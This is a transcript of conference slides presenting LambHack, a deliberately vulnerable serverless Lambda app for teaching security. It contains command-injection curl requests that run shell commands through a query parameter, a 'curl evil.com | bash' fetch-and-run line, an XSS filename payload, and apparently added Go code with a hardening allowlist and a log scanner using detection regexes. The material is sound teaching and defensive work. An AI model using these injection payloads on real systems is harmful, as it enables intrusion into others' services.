lambhack: a vulnerable serverless application


Upload: james-wickett

Post on 21-Jan-2018


TRANSCRIPT

Page 1: LambHack: A Vulnerable Serverless Application

CLOUD AUSTIN @WICKETT

LAMBHACK: A VULNERABLE SERVERLESS APPLICATION

JAMES WICKETT

Page 2: LambHack: A Vulnerable Serverless Application

Development of highly resilient, distributed systems is now easier than ever with serverless; application security, however, is more important than ever before.

WHY IT MATTERS

Page 3: LambHack: A Vulnerable Serverless Application


‣ HEAD OF RESEARCH AT SIGNAL SCIENCES

‣ DEVOPS DAYS AUSTIN ORGANIZER

‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM

‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM

JAMES WICKETT

Page 4: LambHack: A Vulnerable Serverless Application

Serverless encourages functions as deploy units that run as one-time*, read-only* containers, coupled with third-party services that allow running end-to-end applications without worrying about system operation.

SERVERLESS DEFINITION

* - there is container reuse and writability

Page 5: LambHack: A Vulnerable Serverless Application

[Figure: Hardware, VMs and Serverless compared on axes of Waste and Value. Inspiration from @adrianco]

Page 6: LambHack: A Vulnerable Serverless Application


Page 7: LambHack: A Vulnerable Serverless Application


http://martinfowler.com/articles/serverless.html

API GATEWAY

Page 8: LambHack: A Vulnerable Serverless Application

‣ CI/CD

‣ auth

‣ wordpress scraper

‣ event ingestion

‣ chatbots

‣ load testing

MORE SERVERLESS USE CASES

Page 9: LambHack: A Vulnerable Serverless Application


Security

Page 10: LambHack: A Vulnerable Serverless Application


‣ SECURE SOFTWARE SUPPLY CHAIN

‣ DELIVERY PIPELINE

‣ DATA FLOW SECURITY

‣ ATTACK DETECTION

FOUR AREAS OF SERVERLESS SECURITY

Page 11: LambHack: A Vulnerable Serverless Application


https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds

Page 13: LambHack: A Vulnerable Serverless Application

INSPIRED BY WEB GOAT AND ALL THE OTHER GOATS…

Page 14: LambHack: A Vulnerable Serverless Application


Page 15: LambHack: A Vulnerable Serverless Application


‣ SERVERLESS HAS A FALSE SENSE OF SECURITY

‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)

‣ WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS

‣ A VULNERABLE LAMBDA + API GATEWAY STACK

‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…

INTRODUCING LAMBHACK

Page 16: LambHack: A Vulnerable Serverless Application


‣ A VULNERABLE LAMBDA + API GATEWAY STACK

‣ OPEN SOURCE, MIT LICENSED

‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING

‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP

‣ GITHUB.COM/WICKETT/LAMBHACK

github.com/wickett/lambhack

Page 17: LambHack: A Vulnerable Serverless Application


Page 18: LambHack: A Vulnerable Serverless Application


‣ GOLANG!

‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY

‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM

‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES

GO SPARTA

Page 19: LambHack: A Vulnerable Serverless Application


‣ CLOUDWATCH EVENTS AND LOGS

‣ DYNAMODB, KINESIS

‣ S3

‣ SES, SNS

‣ API GATEWAY CREATION

GO SPARTA INCLUDES

Page 20: LambHack: A Vulnerable Serverless Application

lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here.

Page 21: LambHack: A Vulnerable Serverless Application


Page 22: LambHack: A Vulnerable Serverless Application


WHY IS THIS BAD?

command := lambdaEvent.QueryParams["args"] // untrusted query-string value, straight from the request

output := runner.Run(command) // handed to a shell runner with no validation at all
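As an added example (this is not lambhack's or Sparta's code), here is what a hardened form of the same endpoint looks like in Go. The `args` parameter is still accepted, but it can only name an entry in a hypothetical allowlist; each entry maps to a fixed argv that is executed directly, never through a shell, so the `;` and `|` tricks from the following slides have nothing to act on. `allowedActions`, `ResolveCommand`, `RunAllowed` and `ErrNotAllowed` are names chosen for this example.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"strings"
	"time"
)

// lambhack does, in effect:
//     command := lambdaEvent.QueryParams["args"]
//     output := runner.Run(command)
// i.e. the query string goes straight to a shell. The version below keeps
// the same "args" parameter but only accepts an action name that maps to a
// fixed argv, and runs that argv without a shell.

// allowedActions is a hypothetical allowlist (this example's own) of the only
// programs the endpoint may run, with the exact arguments each may use.
var allowedActions = map[string][]string{
	"uname":   {"uname", "-a"},
	"version": {"cat", "/proc/version"},
}

// ErrNotAllowed is returned for any "args" value that is not an allowlisted
// action name, which includes anything carrying shell metacharacters.
var ErrNotAllowed = errors.New("action not in allowlist")

// ResolveCommand maps the untrusted "args" query parameter to a fixed argv.
// "uname -a; sleep 1" or "curl evil.com | bash" are not keys in the
// allowlist, so they fail here before anything executes.
func ResolveCommand(queryParams map[string]string) ([]string, error) {
	action := strings.TrimSpace(queryParams["args"])
	argv, ok := allowedActions[action]
	if !ok {
		return nil, fmt.Errorf("%w: %q", ErrNotAllowed, action)
	}
	out := make([]string, len(argv)) // copy so callers cannot mutate the allowlist
	copy(out, argv)
	return out, nil
}

// RunAllowed executes the resolved argv directly (no "sh -c") under a
// deadline, so a slow or hung process cannot pin the function.
func RunAllowed(ctx context.Context, queryParams map[string]string) (string, error) {
	argv, err := ResolveCommand(queryParams)
	if err != nil {
		return "", err
	}
	cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
	output, err := cmd.CombinedOutput()
	return string(output), err
}

func main() {
	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()
	// Constructed requests: the first and last are legitimate, the middle
	// one is the injection attempt shown on the slides.
	for _, q := range []string{"uname", "uname -a; sleep 1", "version"} {
		out, err := RunAllowed(ctx, map[string]string{"args": q})
		fmt.Printf("args=%q -> err=%v\n%s\n", q, err, out)
	}
}
```

The design choice is that the request never contributes bytes to a command line: it only selects which pre-built argv runs. If the endpoint genuinely needs user-supplied arguments, they still go into a single argv element via `exec.Command` and are validated against a strict pattern first, never interpolated into a string for a shell.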

Page 23: LambHack: A Vulnerable Serverless Application

With command execution available to us in lambhack, we can poke around the container a bit.

Page 24: LambHack: A Vulnerable Serverless Application

UNAME -A

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"

> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Page 25: LambHack: A Vulnerable Serverless Application

CAT /PROC/VERSION

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"

> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

Page 26: LambHack: A Vulnerable Serverless Application

LET'S LOOK IN /TMP

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"

> total 17916
> drwx------  2 sbx_user1056  490     4096 Feb 8 22:02 .
> drwxr-xr-x 21 root          root    4096 Feb 8 21:47 ..
> -rwxrwxr-x  1 sbx_user1056  490 18334049 Feb 8 22:02 Sparta.lambda.amd64

Page 27: LambHack: A Vulnerable Serverless Application

LAMBDA REUSE IN ACTION!

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"

> Sparta.lambda.amd64 wickettfile

Page 28: LambHack: A Vulnerable Serverless Application

WHICH CURL

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"

> /usr/bin/curl

Page 29: LambHack: A Vulnerable Serverless Application

GOT PROXY?

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"

> <!doctype html>
> <html>
> <head>
>     <title>Example Domain</title>
>
>     <meta charset="utf-8" />
>     <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
>     <meta name="viewport" content="width=device-width, initial-scale=1" />
>     <style type="text/css">
>     body {
>         background-color: #f0f0f2;
>         margin: 0;
>         padding: 0;
>         font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
>     }
>     div {
>         width: 600px;
>         margin: 5em auto;
>         padding: 50px;
>         background-color: #fff;
>         border-radius: 1em;
>     }
>     a:link, a:visited {
>         color: #38488f;
>         text-decoration: none;
>     }
>     @media (max-width: 700px) {
>         body {
>             background-color: #fff;
>         }
>         div {
>             width: auto;
>             margin: 0 auto;
>             border-radius: 0;
>             padding: 1em;
>         }
>     }
>     </style>
> </head>
>
> <body>
> <div>
>     <h1>Example Domain</h1>
>     <p>This domain is established to be used for illustrative examples in documents. You may use this
>     domain in examples without prior coordination or asking for permission.</p>
>     <p><a href="http://www.iana.org/domains/example">More information...</a></p>
> </div>
> </body>
> </html>

bit.ly/lh-demo1

Page 30: LambHack: A Vulnerable Serverless Application


‣ HELP NEEDED

‣ ADD XSS AND OTHER ATTACKS

‣ ADD AUTH VECTORS AND EXAMPLES

‣ NEEDS A UI PLEASE!

‣ PULL REQUESTS ACCEPTED :)

FUTURE OF LAMBHACK

Page 31: LambHack: A Vulnerable Serverless Application

APPLICATION SECURITY IS STILL RELEVANT 15+ YEARS LATER

Page 32: LambHack: A Vulnerable Serverless Application


Page 33: LambHack: A Vulnerable Serverless Application


‣ New surface area, similar appsec problems

‣ Command Exec, XSS, Injection Attacks

‣ All the OWASP Top Ten

‣ What is old is new.

‣ Appending ‘curl evil.com | bash’

‣ Add <script>alert(1)</script> to a filename you upload on s3

TYPES OF ATTACKS
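The deck lists attack detection as one of its four areas of serverless security, and the slide above names the payload shapes to look for. As an added example, not part of the deck or of lambhack, here is a small Go scanner that URL-decodes the query string of each API Gateway access-log line and flags parameter values carrying shell metacharacters, a pipe into a shell, or a script tag. The log lines are constructed in an assumed `<client-ip> <method> <path?query> <status>` shape, not real API Gateway output; `ScanLine`, `ScanLines`, `Finding` and the indicator list are this example's own.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// Constructed sample lines in an assumed "<client-ip> <method> <path?query> <status>"
// access-log shape; they are not real API Gateway output. The query values are
// the ones the deck discusses, percent-encoded as a client would send them.
var sampleLogLines = []string{
	`198.51.100.7 GET /prod/lambhack/c?args=uname 200`,
	`198.51.100.7 GET /prod/lambhack/c?args=uname+-a%3B+sleep+1 200`,
	`203.0.113.9 GET /prod/lambhack/c?args=curl+evil.com+%7C+bash 200`,
	`203.0.113.9 GET /prod/upload?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E.png 200`,
	`192.0.2.4 GET /prod/lambhack/c?args=version 200`,
}

// indicators are matched against each decoded query value, i.e. against what
// the function handler would actually receive.
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"shell metacharacter", regexp.MustCompile("[;|&`]|\\$\\(")},
	{"pipe to shell", regexp.MustCompile(`\|\s*(ba)?sh\b`)},
	{"script tag", regexp.MustCompile(`(?i)<script`)},
}

// Finding records one suspicious query parameter value.
type Finding struct {
	Line    string
	Param   string
	Value   string   // decoded value, as the handler would see it
	Reasons []string // indicator names that matched
}

// ScanLine parses one access-log line, URL-decodes its query string and
// returns a Finding for every parameter value that trips an indicator.
// Malformed lines produce no findings rather than an error.
func ScanLine(line string) []Finding {
	fields := strings.Fields(line)
	if len(fields) < 3 {
		return nil
	}
	u, err := url.Parse(fields[2])
	if err != nil {
		return nil
	}
	query := u.Query() // decodes %XX and '+' into the raw value
	params := make([]string, 0, len(query))
	for p := range query {
		params = append(params, p)
	}
	sort.Strings(params) // deterministic order of findings
	var findings []Finding
	for _, p := range params {
		for _, v := range query[p] {
			var reasons []string
			for _, ind := range indicators {
				if ind.re.MatchString(v) {
					reasons = append(reasons, ind.name)
				}
			}
			if len(reasons) > 0 {
				findings = append(findings, Finding{Line: line, Param: p, Value: v, Reasons: reasons})
			}
		}
	}
	return findings
}

// ScanLines runs ScanLine over a batch of lines.
func ScanLines(lines []string) []Finding {
	var all []Finding
	for _, l := range lines {
		all = append(all, ScanLine(l)...)
	}
	return all
}

func main() {
	for _, f := range ScanLines(sampleLogLines) {
		fmt.Printf("%s=%q (%s)\n  %s\n", f.Param, f.Value, strings.Join(f.Reasons, ", "), f.Line)
	}
}
```

Decoding before matching matters: the `;` in the second line arrives as `%3B`, so a pattern applied to the raw log text would miss it. In a real deployment the same logic would run over CloudWatch Logs for the API Gateway stage, and the findings would feed an alert rather than a print loop.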

Page 34: LambHack: A Vulnerable Serverless Application

Development of highly resilient, distributed systems is now easier than ever with serverless; application security, however, is more important than ever before.

WHY IT MATTERS

Page 35: LambHack: A Vulnerable Serverless Application


WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?

Send an email to [email protected]